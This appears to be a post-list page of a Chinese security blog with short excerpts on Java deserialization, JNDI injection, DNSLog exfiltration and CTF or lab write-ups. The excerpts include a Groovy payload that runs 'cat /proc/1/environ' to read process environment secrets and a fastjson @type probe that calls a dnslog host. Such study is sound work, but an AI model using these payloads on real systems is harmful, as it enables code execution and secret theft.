Post List

130 words 1 mins.

def proc = this.class.classLoader.loadClass("java.lang.Runtime").getRuntime().exec("cat /proc/1/environ") proc.text
3.2k words 3 mins.

# XMLDecoder/XMLEncoder XMLDecoder/Encoder 是在 JDK1.4 版中添加的 XML 格式序列化持久型方案,可以比较使用 Json 格式序列化的 FastJson 库。 使用 XMLEncoder 来生成表示 JavaBeans 组件(bean)的 XML 文档,用 XMLDecoder 读取使用 XMLEncoder 创建的 XML 文档获取 JAVAbeans. # XMLEncoder 示例 # 写入代码: package XMLdecode;import javax.swing.*;import...
6.8k words 6 mins.

# JNDI 注入原理及利用探究 # JNDI 是什么: JNDI (Java Naming and Directory Interface) 是一个应用程序设计的 API,一种标准的 java 命名系统接口。JNDI 提供统一的客户端 API,通过不同的访问提供者接口 JNDI 服务供应接口(SPI)的实现,由管理者将 JNDIAPI 映射为特定的命名服务和目录系统,是的 java 应用程序可以和这些命名服务和目录服务之间进行交互。 通俗的来说就是若程序定义了 JNDI 的接口,就可以通过该接口 API 访问系统的命令服务和目录服务,如下图 这里主要探究的时 LADP,RMI,DNS...
986 words 1 mins.

# DNSLog 外带复现 # DNS: DNS 就是域名系统,负责把域名转换成 IP 地址;例如像浏览其访问 a.com,浏览器就会将其解析成真实的 IP 访问 # DNSlog: DNS 的日志,DNS 在域名解析时会留下域名和解析 IP 的记录 # DNSLog 外带原理: DNS 在解析是会留下日志,我们将信息放在高级域名中,传递到自己这里,然后通过读日志来获取信息。 所以这里跟最初的猜想基本一致,原理也就是通过 DNS 请求后,通过读取日志来获取我们的请求信息。 # mysql # load_file 前置条件: 1. 首先有注入点 2. 需要有 root 权限 3....
71k words 1:05

# java 反序列化 漏洞挖掘: 1. 找到发送 JSON 序列化数据的接口 2 判断是否使用 fastjson 非法格式报错 {"x":" 2) 使用 dnslog 探测 {"x":{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn")} Burp...
6.8k words 6 mins.

title: YLctf2024 date: 2024-10-28 19:23:59 tags: [sql 的 join, php 反序列化,xml 文件上传] categories: [比赛复现] # 简单 :pExpl 源码: <?phperror_reporting(0);class FileHandler { private $fileHandle; private $fileName; public function __construct($fileName, $mode = 'r') {...
41k words 37 mins.

# java-sec-code 靶场复现: 搭建:这是有个 springboot 项目,直接打开这个项目运行即可 记得配置配置文件 application.properties 这个文件的 jdbc 的账号和密码记得换成自己的账号密码 在配置文件周围有个 create_db.sql 记得先创建这个库,再是运行里面的内容 再是登录就是下面的页面 # Cmdinject # /codeinject 接下来就是复现这个漏洞了,审计源代码: @GetMapping("/codeinject") public String codeInject(String filepath)...
1.2k words 1 mins.

首先先起 docker: docker-compose up -d ----d这个配置是都起,不然数据库可能就起不来,直接报错然后 docker ps 找到这个的容器号, root@hcss-ecs-7f85:~/靶场/vulhub-master/ecshop/xianzhi-2017-02-82239600# docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMESaf16791ab7eb vulhub/ecshop:3.6.0 "docker-php-entrypoi…" 12 minutes ago...
527 words 1 mins.

# [SWPU2019] 你有没有好好看网课? 打开有两个文件,需要解压,先考虑是不是伪加密,好像不是 若是伪加密,就是 00 00,01 的意思就是确实是加密了 flag3 给了解压密码提示: 掩码一下 拿到密码: 183792 解压出来就是一个 docx 文件和一个音频文件 给了 5.20,711 的提示,估计是在文件的 5.20-7.11 之间有个提示,可以看一下 在 5.63 秒这里有一个信息 ..... ../... ./... ./... ../ # 敲击码 以 / 为划分: ..... ../... ./... ./... ../ 5,2 3,1 3,1...